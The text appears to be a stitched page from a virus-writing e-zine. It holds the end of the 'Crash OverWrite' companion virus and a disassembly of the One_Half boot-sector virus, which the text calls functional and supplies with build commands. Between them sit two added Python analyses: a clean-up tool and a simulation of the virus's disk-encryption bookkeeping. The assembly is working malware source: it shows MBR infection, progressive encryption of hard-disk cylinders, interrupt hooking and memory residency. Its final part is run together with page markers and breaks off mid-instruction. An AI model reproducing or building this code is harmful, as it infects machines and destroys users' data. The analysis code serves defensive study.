        add     eax, 1
        mov     byte ptr ds:[eax], 't'
        add     eax, 1
        mov     byte ptr ds:[eax], 00h

that_was_all:
        push    winsize
        push    offset myname
        call    WinExec

final:
        push    0
        call    ExitProcess

ends
end start
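The infection above leaves a recognisable pair on disk: the original program survives under its own name with a .dat extension, and the .exe of that name is a 1000h-byte copy of the virus carrying the '[Crash OverWrite] coded by BeLiAL' string, with the host's file name patched in at changeoffset (094fh) so that `reanimate` can start the host. The Python below is an added clean-up example written for this page, not part of the virus or of any product: it finds such pairs in a directory and puts the host back under its own name. Assumptions: changeoffset is taken at face value as the file offset of `myname` in the built binary, the marker is searched anywhere in the 4 KiB, and the fixture directory the code builds is entirely constructed (no real sample is involved).

```python
"""Companion-infection clean-up for the CrashOverwrite pattern described above.

Added example for this page, not the virus author's code. Constants are taken
from the source listing: filesize (1000h), the marker string in .data and
changeoffset (094fh), the offset at which the host name is patched in.
"""
import os
import tempfile
from typing import Dict, List, Optional, Tuple

VIRUS_SIZE = 0x1000
MARKER = b"[Crash OverWrite] coded by BeLiAL"
NAME_OFFSET = 0x94F            # changeoffset: assumed file offset of 'myname'


def is_dropper(data: bytes) -> bool:
    """The virus recognises itself by size alone; we also require the marker."""
    return len(data) == VIRUS_SIZE and MARKER in data


def host_name(data: bytes) -> Optional[str]:
    """Return the NUL-terminated host name patched in at changeoffset, if any."""
    if not is_dropper(data) or NAME_OFFSET >= len(data):
        return None
    end = data.find(b"\x00", NAME_OFFSET)
    name = data[NAME_OFFSET:end if end >= 0 else len(data)]
    if not name or not name.lower().endswith(b".exe"):
        return None
    try:
        return name.decode("ascii")
    except UnicodeDecodeError:
        return None


def find_companions(root: str) -> List[Tuple[str, str]]:
    """(infected .exe, surviving .dat) pairs in root; the .dat must still be an MZ file."""
    pairs = []
    for fn in sorted(os.listdir(root)):
        if not fn.lower().endswith(".exe"):
            continue
        with open(os.path.join(root, fn), "rb") as f:
            data = f.read(VIRUS_SIZE + 1)           # one extra byte: size must be exact
        host = host_name(data)
        if host is None:
            continue
        dat = os.path.splitext(host)[0] + ".dat"    # reanimate's rename: .exe -> .dat
        dat_path = os.path.join(root, dat)
        if not os.path.isfile(dat_path):
            continue
        with open(dat_path, "rb") as f:
            if f.read(2) == b"MZ":
                pairs.append((fn, dat))
    return pairs


def restore(root: str) -> List[str]:
    """Move each surviving host back over its dropper; returns the restored names."""
    restored = []
    for exe, dat in find_companions(root):
        os.replace(os.path.join(root, dat), os.path.join(root, exe))
        restored.append(exe)
    return restored


def dir_sizes(root: str) -> Dict[str, int]:
    """Name -> size of every file in root (used to check the result)."""
    return {fn: os.path.getsize(os.path.join(root, fn)) for fn in sorted(os.listdir(root))}


def build_sample_dir() -> str:
    """Constructed fixture, not real samples: one infected host, one clean program."""
    root = tempfile.mkdtemp(prefix="crashoverwrite_")
    dropper = bytearray(VIRUS_SIZE)                  # stand-in for the 1000h-byte virus
    dropper[:2] = b"MZ"
    dropper[0x800:0x800 + len(MARKER)] = MARKER
    dropper[NAME_OFFSET:NAME_OFFSET + 10] = b"victim.exe"   # a NUL already follows
    with open(os.path.join(root, "victim.exe"), "wb") as f:
        f.write(dropper)
    with open(os.path.join(root, "victim.dat"), "wb") as f:    # the displaced host
        f.write((b"MZ" + b"original host program").ljust(0x2000, b"\x00"))
    with open(os.path.join(root, "clean.exe"), "wb") as f:     # wrong size: never a dropper
        f.write(b"MZ".ljust(0x3000, b"\x00"))
    return root


if __name__ == "__main__":
    d = build_sample_dir()
    print(find_companions(d))
    print(restore(d), dir_sizes(d))
```

The .dat lookup deliberately uses the name the dropper carries rather than the dropper's own file name: that is the name `reanimate` will execute, so it is the pairing the virus itself relies on, and it still works if the infected .exe was renamed afterwards.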


; Virus One_Half
; Disassembly done by Ratter

; It's a polymorphic, reversible, multipartite virus from a Slovak coder known
; under the nick Vyvojar (== Developer). He is also the author of Level3.
; This is the disassembly I enjoyed the most. It's one of the best viruses
; in the dead world of DOS.
; It's functional. Just compile and run :)

; To Vyvojar: If ya're still living, could ya pls lemme know about it?
; I would be very happy if I could speak with you sometime ...
; To otherz who are reading this: Pls lemme know if there's any bug in the code.
; Or just to say ya like this :)
; You can reach me on Undernet channel #virus, #3c or via email: [email protected]

; Compile:
; tasm /t/m2 one_half.asm
; tlink /t one_half.obj

.486p

.487

seg_a   segment byte public use16
        assume  cs:seg_a, ds:seg_a

        org     100h

one_half proc far
start:
        jmp     loc_08d1                ; jmp to viruz_start
;       jmp     loc_0208                ; jmp to decode routine_start

        db      101 dup (0)
loc_0168:
        db      81h, 0C0h, 0FEh, 6Eh    ; add ax, 6EFEh
        jmp     loc_056c
;       db      19 dup (0)
;
loc_0182:
        cld
        std
        jnz     short loc_01B1
        jmp     loc_08D1
;       db      40 dup (0)
;
loc_01B1:
        xor     [di], ax
        jmp     short loc_0168
;       db      64 dup (0)
;
loc_01f5:
        db      2eh                     ; cs:
        mov     di, 582h
        db      36h                     ; ss:
        db      3eh                     ; ds:
        jmp     loc_049b
;       db      10 dup (0)
;
loc_0208:
        push    ax
        nop
        db      36h                     ; ss:
        sti
        db      36h                     ; ss:
        clc
        sti
        jmp     loc_0381
;       db      367 dup (0)
;
loc_0381:
        push    cs
        cld
        jmp     loc_047c
;       db      246 dup (0)
;
loc_047C:
        nop
        sti
        db      36h                     ; ss:
        clc
        nop
        pop     ds
        db      36h                     ; ss:
        jmp     loc_01f5
;       db      21 dup (0)
;
loc_049b:
        cld
        db      3eh                     ; ds:
        mov     ax, 0bfbah
        db      3eh                     ; ds:
        std
        jmp     loc_01b1
;       db      148 dup (0)
;
loc_0539:
        db      81h, 0FFh, 5Ah, 13h     ; cmp di, 135ah
        sti
        jmp     loc_0182
;       db      43 dup (0)
;
loc_056c:
        clc
        sti
        cmc
        db      3eh                     ; ds:
        nop
        inc     di
        db      36h                     ; ss:
        jmp     loc_0539
        pop     ss
;       db      12 dup (0)
;


loc_0582:
;
p       label   near
p_      equ     offset the_second_part - offset boot_start
p__     equ     presun_rutiny + (p - buffer)

;
_mcb_   db      'Z'                     ; it'z last_block
        dw      9F01h                   ; PSP
        dw      0FFh                    ; 4096 bytez
        db      3 dup (?)               ; reserved
        db      'COMMAND', 0            ; blockz_owner_name ...
;
exe_header dw   20CDh                   ; exe_signature
part_pag dw     501eh
page_cnt dw     09b4h
relo_cnt dw     0
hdr_size dw     21cdh
min_mem dw      1f58h
max_mem dw      0bac3h
relo_ss dw      03d0h
exe_sp  dw      0efe8h
exe_flag db     00h                     ; checksum
        db      0b4h
exe_ip  dw      0100h
relo_cs dw      0FFF0h
tabl_off dw     0BA05h

;
decode_routine_table:
        dw      0208h                   ; here'z the table
        dw      0381h                   ; of offsetz, where are
        dw      047ch                   ; the chunkz of code of
        dw      01f5h                   ; decode_routine
        dw      049bh
xor_offset dw   01b1h
        dw      0168h
        dw      056ch
        dw      0539h
jnz_offset dw   0182h
;
beginning_ofs dw 07beh
;
overwritten_bytez:
        db      06h, 83h, 05h, 00h, 00h, 2Eh
        db      8Ch, 0Eh, 85h, 05h, 4Fh, 02h
        db      00h, 2Eh, 0A1h, 0A3h, 05h, 26h
        db      0C7h
        db      'G.com <jmen'
        db      0Bh, 26h, 3Ah, 47h, 21h, 0BAh
        db      4Ah, 05h, 0Fh
        db      '„_driveru>', 0Ah, 't'
        db      0FFh, 0C6h, 44h, 0FFh, 00h, 0B8h
        db      03h, 4Bh, 0BBh, 80h, 00h, 8Ah
        db      0Ch, 0Ah, 0C9h, 0BAh, 68h, 04h
        db      0Fh
        db      'ys ...', 0Ah, 0Dh, '$'
        db      17h
        db      'instalovan'
        db      02h, 0EBh, 03h, 0E9h, 43h, 02h
        db      4Eh, 56h, 89h, 36h
;
;
hdr_size_ dw    10h
date_div dw     1Eh
page_size_ dw   200h

;

; Here starts the boot_version of One_Half
boot_start:
        xor     bx, bx
        cli
        mov     sp, 07c00h              ; set up stack
        mov     ss, bx                  ; 2 0000h:7c00h
        sti
        mov     ds, bx
        sub     word ptr ds:[413h], 4   ; dec mem_size by 4 kB
        mov     cl, 6
        int     12h                     ; gimme mem_size
        shl     ax, cl                  ; count the segment
        mov     dx, 80h                 ; first harddisk, 0. head
        mov     es, ax                  ; my_new_seg 2 es
        db      0b9h                    ; mov cx, ?
viruz_start_sec dw 0bh                  ; gimme virus_start_sec
        mov     ax, 0207h               ; read 7 secz
        push    es                      ; (viruz_body)
        int     13h
        mov     ax, offset the_second_part - p
        push    ax
        retf                            ; go2 new_segment_part
;
the_second_part:
        mov     word ptr ds:[21h * 4 + 2], cs ; store cs 2 21h * 4 + 2
        mov     ax, word ptr ds:[46ch]  ; gimme tick_counter
        push    ds
        push    cs                      ; make ds = cs
        pop     ds
        mov     word ptr ds:[mov_bx_? - p], ax ; store counter
        mov     ax, cs
        inc     ax
        mov     word ptr ds:[_mcb_ + 1 - p], ax ; store block_owner
        mov     byte ptr ds:[run_jmp - p], 0 ; zero the displ8 2 set our
                                        ; own _mcb_ as last_one
        call    sub_078b                ; move presun_rutiny
        pop     es
        mov     bx, sp                  ; 7c00h 2 bx
        push    es
        mov     si, word ptr es:[bx+p_] ; gimme cur_cyl_number_
                                        ; _2_crypt
        db      81h, 0feh               ; cmp si, ?
lowest_cyl dw   07h                     ; less than lowest_cyl ?
        jbe     loc_06d6
        push    si                      ; nope
        sub     si, 2                   ; ok crypt 2 cylinderz
        mov     word ptr ds:[not_crypt_cyl - p], si ; store cyl - 2
        pop     si
        mov     ah, 08h                 ; gimme drivez_paramz
        int     13h
        jc      loc_06d6                ; error ?
        mov     al, cl                  ; gimme max_sec_number
        and     al, 03fh                ; mask max_sec
        mov     byte ptr ds:[secz_count - p__], al ; secz_2_crypt
        mov     cl, 1                   ; starting_sec 2 cl
        mov     bh, 7eh                 ; buffer_ptr 2 7e00h
        mov     word ptr ds:[buf_ptr - p__], bx ; store buffer_ptr
        mov     dl, 80h                 ; set up drive 2 first harddisk

loc_069E:
        dec     si                      ; dec cylinder_number
        call    sub_0798                ; convert cyl_number
        push    dx

loc_06A3:
        mov     ah, 2                   ; read 1 track
        push    ax
        int     13h
        pop     ax
        jc      short loc_06B4          ; error ?
        db      0e8h                    ; call crypt_
        dw      offset crypt_ - presun_rutiny + buffer - next_
next_   label   near                    ; crypt_ it
        inc     ah                      ; make function 03h
        push    ax
        int     13h                     ; and write crypted_track
        pop     ax

loc_06B4:
        jc      short loc_072B          ; error ?
        test    dh, 3Fh                 ; last head ?
        jz      short loc_06BF
        dec     dh                      ; dec head
        jmp     short loc_06A3          ; and go on

loc_06BF:                               ; yope
        pop     dx
        db      81h, 0feh               ; cmp si, ?
not_crypt_cyl dw 1bfh                   ; ok 2 cylinderz crypted_ ?
        ja      loc_069E

loc_06C6:                               ; yope
        mov     bh, 7Ch                 ; buffer 2 7c00h
        mov     es:[bx+p_], si          ; store new cur_cyl_number_2_
        mov     ax, 301h                ; _crypt
        mov     cx, 1                   ; and write partition_table
        mov     dh, ch                  ; (boot_start) back
        int     13h

loc_06D6:
        mov     ds:[cur_cyl_number - p__], si
        db      81h, 0feh               ; cmp si, ?
one_half_cyl dw 136h                    ; more than one_half_crypted ?
        ja      short loc_06E3
        call    sub_07EC                ; ok try 2 write text

loc_06E3:                               ; nope not yet
        mov     ax, 201h                ; ok now read
        mov     bx, 7C00h               ; 2 buffer 7c00h
        mov     cx, ds:[viruz_start_sec - p] ; gimme viruz_...
        dec     cx                      ; go2 orig_partition_table
        mov     dx, 80h                 ; orig_partition_table
        int     13h
        cli
        les     ax, dword ptr es:[13h * 4] ; gimme old_int_13h
        mov     ds:[old_int_13h - p__], ax ; and store it
        mov     ds:[old_int_13h - p__ + 2], es
        pop     es
        push    es
        les     ax, dword ptr es:[1ch * 4] ; gimme old_int_1ch
        mov     ds:[old_int_1ch - p], ax ; and store it
        mov     ds:[old_int_1ch - p + 2], es
        pop     es
        push    es                      ; set up my own
        mov     word ptr es:[13h * 4], offset new_int_13h - p__
        mov     word ptr es:[13h * 4 + 2], cs ; new_int_13h
        mov     word ptr es:[1ch * 4], offset new_int_1ch - p
        mov     word ptr es:[1ch * 4 + 2], cs ; and new_int_1ch
        sti
        push    bx
        retf                            ; and jump 2 orig_partition

; Diz uncryptz the cylinder again if any error occurez
loc_072B:
        xor     ah, ah
        push    ax
        int     13h                     ; try 2 reset the disk
        pop     ax

loc_0731:
        inc     dh                      ; inc head
        mov     ah, dh                  ; head 2 ah
        pop     dx                      ; pop max_head
        push    dx
        cmp     ah, dh                  ; cmp cur_head with max_head
        ja      short loc_074E          ; above ?
        mov     dh, ah                  ; cur_head 2 dh
        mov     ah, 2                   ; read track
        push    ax
        int     13h
        pop     ax
        db      0e8h                    ; call crypt_
        dw      offset crypt_ - presun_rutiny + buffer - next__
next__  label   near                    ; uncrypt_ it
        inc     ah
        push    ax
        int     13h                     ; and write it back
        pop     ax
        jmp     short loc_0731

loc_074E:                               ; yope (error on first_cyl)
        pop     dx                      ; pop max_head
        inc     si                      ; inc cyl_number
        jmp     loc_06C6                ; and end with crypt_

new_int_1ch:
        push    ax
        push    ds
        push    es
        xor     ax, ax
        mov     ds, ax
        les     ax, dword ptr ds:[21h * 4] ; gimme int_21h
        mov     cs:[old_int_21h - p__], ax ; store offset
        mov     ax, es                  ; gimme seg
        cmp     ax, 800h                ; are we under 800h ?
        ja      short loc_0783
        mov     word ptr cs:[old_int_21h - p__ + 2], ax ; yope
                                        ; we've got dos_int_21h_seg
        les     ax, dword ptr cs:[old_int_1ch - p] ; gimme old_int_1ch
        mov     ds:[1ch * 4], ax        ; restore it back
        mov     word ptr ds:[1ch * 4 + 2], es
        mov     word ptr ds:[21h * 4], offset new_int_21h - p ; and set up
        mov     word ptr ds:[21h * 4 + 2], cs ; my new_int_21h

loc_0783:                               ; nope
        pop     es
        pop     ds                      ; restore regz
        pop     ax                      ; and
        db      0EAh                    ; jmp far ptr old_int_1ch
old_int_1ch dw  0FF53h, 0F000h

one_half endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz movez some routinez ...
sub_078B proc near
        mov     si, offset presun_rutiny - p
        mov     di, offset buffer - p
        mov     cx, offset f_read_ - offset presun_rutiny - 4
        cld
        rep     movsb
        retn
sub_078B endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz makez from cyl_number_in_si a valid cx_reg
sub_0798 proc near
        push    ax
        mov     ax, si
        mov     ch, al
        push    cx
        mov     cl, 4
        shl     ah, cl
        pop     cx
        mov     al, 3Fh                 ; '?'
        and     dh, al
        and     cl, al
        not     al
        push    ax
        and     ah, al
        or      dh, ah
        pop     ax
        shl     ah, 1
        shl     ah, 1
        and     ah, al
        or      cl, ah
        pop     ax
        retn
sub_0798 endp
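Two pieces of the boot code above are worth reproducing exactly: sub_0798, which packs a cylinder number into the CX/DH registers for INT 13h, and the loop at loc_069E..loc_06BF, which on every boot reads, encrypts and rewrites two more cylinders (all heads, highest head first), lowers cur_cyl_number in the partition sector, stops once lowest_cyl is reached, and starts the text check once cur_cyl is at or below one_half_cyl. The Python below is an added example for this page, not code from the virus or its disassembler. pack_chs follows the bit operations of sub_0798 (note that it parks cylinder bits 10-11 in DH bits 6-7, beyond the standard 10-bit INT 13h layout); simulate_boots replays the per-boot bookkeeping from a fresh install, where loc_09C3 stores max_cyl_number as the starting cur_cyl and one_half_cyl = (lowest_cyl + max_cyl) / 2. The encryption routine itself (crypt_) is not in this part of the listing, so the simulation tracks which tracks are touched, not the transform. The geometry values used in the test (max_cyl 265h, lowest_cyl 7) are the ones present in this specimen's data; the head count is an assumption.

```python
"""One_Half boot-time bookkeeping: INT 13h CHS packing as in sub_0798 and the
two-cylinders-per-boot walk of loc_069E..loc_06BF.

Added example for this page, not the virus author's or the disassembler's code.
"""
from typing import List, Tuple

Track = Tuple[int, int, int, int]      # (cylinder, head, CX, DH) as handed to INT 13h


def pack_chs(cyl: int, head: int, sector: int) -> Tuple[int, int]:
    """Reproduce sub_0798: SI = cylinder, DH = head, CL = sector -> (CX, DH).

    CH gets cylinder bits 0-7 and CL bits 6-7 get cylinder bits 8-9 (the standard
    INT 13h layout); the routine additionally ORs cylinder bits 10-11 into DH
    bits 6-7.  Bits above 11 are lost, as they are in the 8-bit AH arithmetic.
    """
    ch = cyl & 0xFF
    cl = (sector & 0x3F) | (((cyl >> 8) & 0x3) << 6)
    dh = (head & 0x3F) | (((cyl >> 10) & 0x3) << 6)
    return (ch << 8) | cl, dh


def unpack_chs(cx: int, dh: int) -> Tuple[int, int, int]:
    """Inverse of pack_chs: (cylinder, head, sector)."""
    cyl = (cx >> 8) | ((cx & 0xC0) << 2) | ((dh & 0xC0) << 4)
    return cyl, dh & 0x3F, cx & 0x3F


def boot_crypt_pass(cur_cyl: int, lowest_cyl: int, max_head: int) -> Tuple[int, List[Track]]:
    """One boot: the tracks the_second_part reads, crypts and rewrites, in order.

    Nothing happens once cur_cyl <= lowest_cyl (the jbe loc_06d6 exit).  Otherwise
    not_crypt_cyl = cur_cyl - 2 and the loop runs while SI > not_crypt_cyl,
    decrementing SI first and walking the heads from max_head down to 0.  Returns
    the new cur_cyl (SI, written back to the partition sector) and the track list.
    """
    if cur_cyl <= lowest_cyl:
        return cur_cyl, []
    not_crypt_cyl = cur_cyl - 2
    tracks: List[Track] = []
    si = cur_cyl
    while True:
        si -= 1                                     # dec si
        for head in range(max_head, -1, -1):        # test dh,3Fh / dec dh
            cx, dh = pack_chs(si, head, 1)          # starting sector 1
            tracks.append((si, head, cx, dh))
        if not si > not_crypt_cyl:                  # cmp si, not_crypt_cyl / ja
            return si, tracks


def simulate_boots(max_cyl: int, lowest_cyl: int, max_head: int) -> Tuple[int, int, List[int]]:
    """Replay boots from a fresh install (cur_cyl starts at max_cyl_number).

    Returns (first boot on which the one_half_cyl check passes, number of boots
    that still encrypt something, cur_cyl after each of those boots).  The text
    is only printed on such a boot if the date and run_counter parity tests in
    sub_07EC also pass; those are not modelled here.
    """
    one_half_cyl = (lowest_cyl + max_cyl) >> 1      # add ax, si / shr ax, 1
    cur, boots, history, first_text = max_cyl, 0, [], None
    while True:
        cur, tracks = boot_crypt_pass(cur, lowest_cyl, max_head)
        if not tracks:
            return first_text, boots, history
        boots += 1
        history.append(cur)
        if first_text is None and cur <= one_half_cyl:   # cmp si, one_half_cyl / ja
            first_text = boots


if __name__ == "__main__":
    print(pack_chs(612, 15, 1), unpack_chs(*pack_chs(0x4FF, 3, 63)))
    first, total, hist = simulate_boots(0x265, 7, 15)
    print(first, total, hist[:3], hist[-1])
```

For clean-up the consequence is the usual one for this family: the cylinders from the stored cur_cyl_number up to (but not including) max_cyl_number are the encrypted ones, and the boot sector must not be replaced until they have been decrypted, since the key and the counter live only in the virus's own sectors.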

text_   db      'Dis is one half.', 0Dh, 0Ah, 'Pr'
        db      'ess any key to continue ...', 0Dh
        db      0Ah

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz writez text if run_counter is even and it iz an even day etc.
sub_07EC proc near
        mov     ah, 4                   ; gimme CMOS date_&_time
        int     1Ah
        jc      short loc_ret_0816
        test    dl, 3                   ; day even etc. ?
        jnz     short loc_ret_0816
        test    word ptr ds:[run_counter - p], 1 ; run_counter is even ?
        jnz     short loc_ret_0816
        mov     cx, offset sub_07ec - offset text_ ; gimme text_length
        mov     si, offset text_ - p    ; gimme text_offset
        mov     ah, 0Fh                 ; gimme cur_video_page_number
        int     10h                     ; why ?
        mov     bl, 7
        mov     ah, 0Eh                 ; print char 2 cur_page ...

locloop_080D:
        lodsb                           ; gimme byte
        int     10h
        loop    locloop_080D            ; and go on

        xor     ah, ah                  ; wait 4 keyprezz
        int     16h

loc_ret_0816:
        retn                            ; and end ...
sub_07EC endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz an int_21h file function with a handle in bx
sub_0817 proc near
        push    bx
        db      0bbh                    ; mov bx, ?
handle_ dw      0                       ; gimme handle
        int     21h                     ; call int_21h
        pop     bx
        retn                            ; and end ...
sub_0817 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz int_13h
int_13h proc near
        pushf
        cli
        db      9Ah                     ; call far ptr int_13h_addr
int_13h_addr dw 774h, 70h
        retn
int_13h endp

; This is used for int_13h tracing
new_int_01h:
        push    bp
        mov     bp, sp
        db      0ebh
jump_patch_? db offset loc_084f - ($ + 1) ; jmp short loc_084F
        db      81h, 7eh, 04h           ; cmp word ptr [bp+4], ?
which_segment_? dw 0253h
        ja      short loc_0853
        push    ax
        push    bx
        push    ds
        lds     ax, dword ptr [bp+2]
        db      0bbh
new_int_01h_mov_bx_? dw 5200h           ; mov bx, ?
        mov     cs:[int_13h_addr - p][bx], ax
        mov     cs:[int_13h_addr - p + 2][bx], ds
        mov     byte ptr cs:[jump_patch_? - p][bx], offset loc_084f - (offset jump_patch_? + 1)
        pop     ds
        pop     bx
        pop     ax

loc_084F:
        and     byte ptr [bp+7], 0FEh

loc_0853:
        pop     bp
        iret

; Diz installz viruz 2 mem
loc_0855:
        pop     bx                      ; pop index
        pop     ax                      ; pop es_seg
        push    ax
        dec     ax                      ; go2 mcb_block
        mov     ds, ax                  ; store it 2 ds
        cmp     byte ptr ds:[0], 5Ah    ; last one ?
        jne     short loc_08CE
        add     ax, ds:[3]              ; add blockz_size
        sub     ax, 0FFh                ; sub 4 viruz_body
        mov     dx, cs                  ; (4 our bufferz etc.)
        mov     si, bx                  ; index 2 si
        mov     cl, 4
        shr     si, cl                  ; make paragraphz
        add     dx, si                  ; add it 2 cs
        db      2eh, 8bh, 0b7h, 1ah, 00h ; mov si, cs:[1ah][bx]
                                        ; gimme min_mem (from exe_header)
        cmp     si, 106h
        jae     short loc_0881
        mov     si, 106h

loc_0881:
        add     dx, si                  ; add min_mem
        cmp     ax, dx                  ; less ?
        jb      short loc_08CE
        mov     byte ptr ds:[0], 4Dh    ; make middle_block
        sub     word ptr ds:[3], 100h   ; sub 100h paragraphz
                                        ; (0ffh viruz and 01h _mcb_)
        mov     ds:[12h], ax            ; set new mem_top 2 PSP
        mov     es, ax                  ; gimme where_2_move_seg
        push    cs
        pop     ds
        inc     ax
        mov     ds:[1], ax              ; store owner
        mov     byte ptr [which_jump_? - p][bx], 0EBh
        mov     si, bx                  ; gimme index
        xor     di, di                  ; move 2 0000h
        mov     cx, offset buffer - p   ; gimme viruz_size
        rep     movsb                   ; and finally move
        push    es
        pop     ds
        call    sub_078B                ; move presun_rutiny
        xor     ax, ax
        mov     ds, ax
        cli
        mov     ax, ds:[21h * 4]        ; gimme old_int_21h
        mov     es:[old_int_21h - p__], ax ; store it
        mov     ax, word ptr ds:[21h * 4 + 2]
        mov     es:[old_int_21h - p__ + 2], ax
        mov     word ptr ds:[21h * 4], offset new_int_21h - p
        mov     word ptr ds:[21h * 4 + 2], es ; and set my own
        sti                             ; int_21h

loc_08CE:
        jmp     loc_0A1E                ; and go on

; Diz iz the beginning ...
loc_08D1:
        call    sub_08D4


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜsub_08D4 proc near

pop sisub si , offset sub_08d4 - p ; count where we aremov [ new_int_01h_mov_bx_? - p][ si ], sipush espush si ; si = 582hcldinc word ptr [ run_counter - p][ si ]mov byte ptr [ which_jump_? - p][ si ], 74hxor ax , axmov es , axmov ax , es :[ 46Ch] ; gimme tick_countermov [ mov_bx_? - p][ si ], ax ; store itmov [ crypt_value - p][ si ], ax ; 2 timezmov ax , 4B53h ; am i in mem ?int 21hcmp ax , 454Bh ; check markje short loc_0965mov ah, 52h ; nope so go onint 21h ; gimme list_of_listz_ptrmov ax , es :[ bx - 2] ; gimme 1. MCB_segmentmov [ which_segment_? - p][ si ], ax ; store itmov byte ptr [ jump_patch_? - p][ si ], 0mov ax , 3501h ; get int_01hint 21hpush bx ; store it to stackpush esmov ax , 3513h ; get int_13hint 21hmov [ int_13h_addr - p][ si ], bx ; store it tomov [ int_13h_addr - p + 2][ si ], es ; variablezmov ax , 2501h ; set my int_01hlea dx , [ new_int_01h - p][ si ]int 21hlea bx , [ buffer - p][ si ]mov cx , 1 ; read partition_tablemov dx , 80hpush cspop espushfpop axor ah, 1 ; set trap_flagpush axpopfmov ax , 201h ; and trace int_13hcall int_13hpushfpop axand ah, 0FEh ; null trap_flagpush axpopfpop dspop dxpushfmov ax , 2501h ; restore int_01hint 21hpopfjc short loc_09C0 ; any errorz ?push cspop ds

Page 280: EZine - Coderz #1

cmp word ptr [ bx +25h ], offset the_second_part - pjne short loc_0968 ; iz in partition my viruz ?

; (mark)loc_0965 :

jmp loc_0A1Dloc_0968 :

cmp word ptr [ bx + 180h ], 72Eh; next markje short loc_09C0mov ah, 8 ; gimme hard_paramzmov dl , 80h ; prvniho_hadrucall int_13hjc short loc_09C0 ; error ?and cx , 3Fh ; voklesti max_sectormov [ max_sektor - p][ si ], clmov [ max_sektor_2 - p][ si ], cland dh, 3Fh ; voklesti headzmov [ max_heads - p][ si ], dhmov ax , 301hsub cl , 7mov [ partition_sec_n - p][ si ], clmov dx , 80hcall int_13h ; write partition_tablejc short loc_09C0 ; error ?push cxpush dxpush sixchg di , simov cx , 4 ; 4 entryzadd bx , 1EEh ; go2 last_parition_entry

locloop_09A9 :mov al , [ bx +4] ; read FAT typecmp al , 1 ; DOS 12bit ?je short loc_09C3cmp al , 4 ; 4 = DOS 16bit ?jb short loc_09B8 ; 5 = EXTENDED_DOS_PARTITION ?cmp al , 6 ; 6 = BIGDOS (nad 32Mbyte) ?jbe short loc_09C3

loc_09B8 :sub bx , 10h ; every record has 10h bytezloop locloop_09A9

pop sipop dxpop cx

loc_09C0 :jmp loc_0855 ; jmp 2 mem_install

loc_09C3 :mov cx , [ bx +2] ; gimme boot_startmov dh, [ bx +1] ; gimme headcall sub_0D2F ; convert_itadd si , 7 ; make valid cyl_numbermov [ lowest_cyl - p][ di ], si ; store itxchg si , axmov cx , [ bx +6] ; gimme end cylindermov dh, [ bx +1] ; gimme headcall sub_0D2F ; convert_itmov [ max_cyl_number - p][ di ], si ; store itmov [ mov_ax_? - p][ di ], si ; store itadd ax , sishr ax , 1 ; div with 2mov [ one_half_cyl - p][ di ], ax ; store one_halfpop sipop dx

Page 281: EZine - Coderz #1

pop cxmov ax , 307hxchg bx , siinc cxmov [ viruz_start_sec - p][ bx ], cxcall int_13h ; write viruz_ bodyjc loc_09C0 ; (whole)lea si , [ boot_start - p][ bx ] ; and now move bootlea di , [ buffer - p][ bx ]push dimov cx , offset the_second_part - offset boot_startrep movsbdb 0b8h ; mov ax, ?

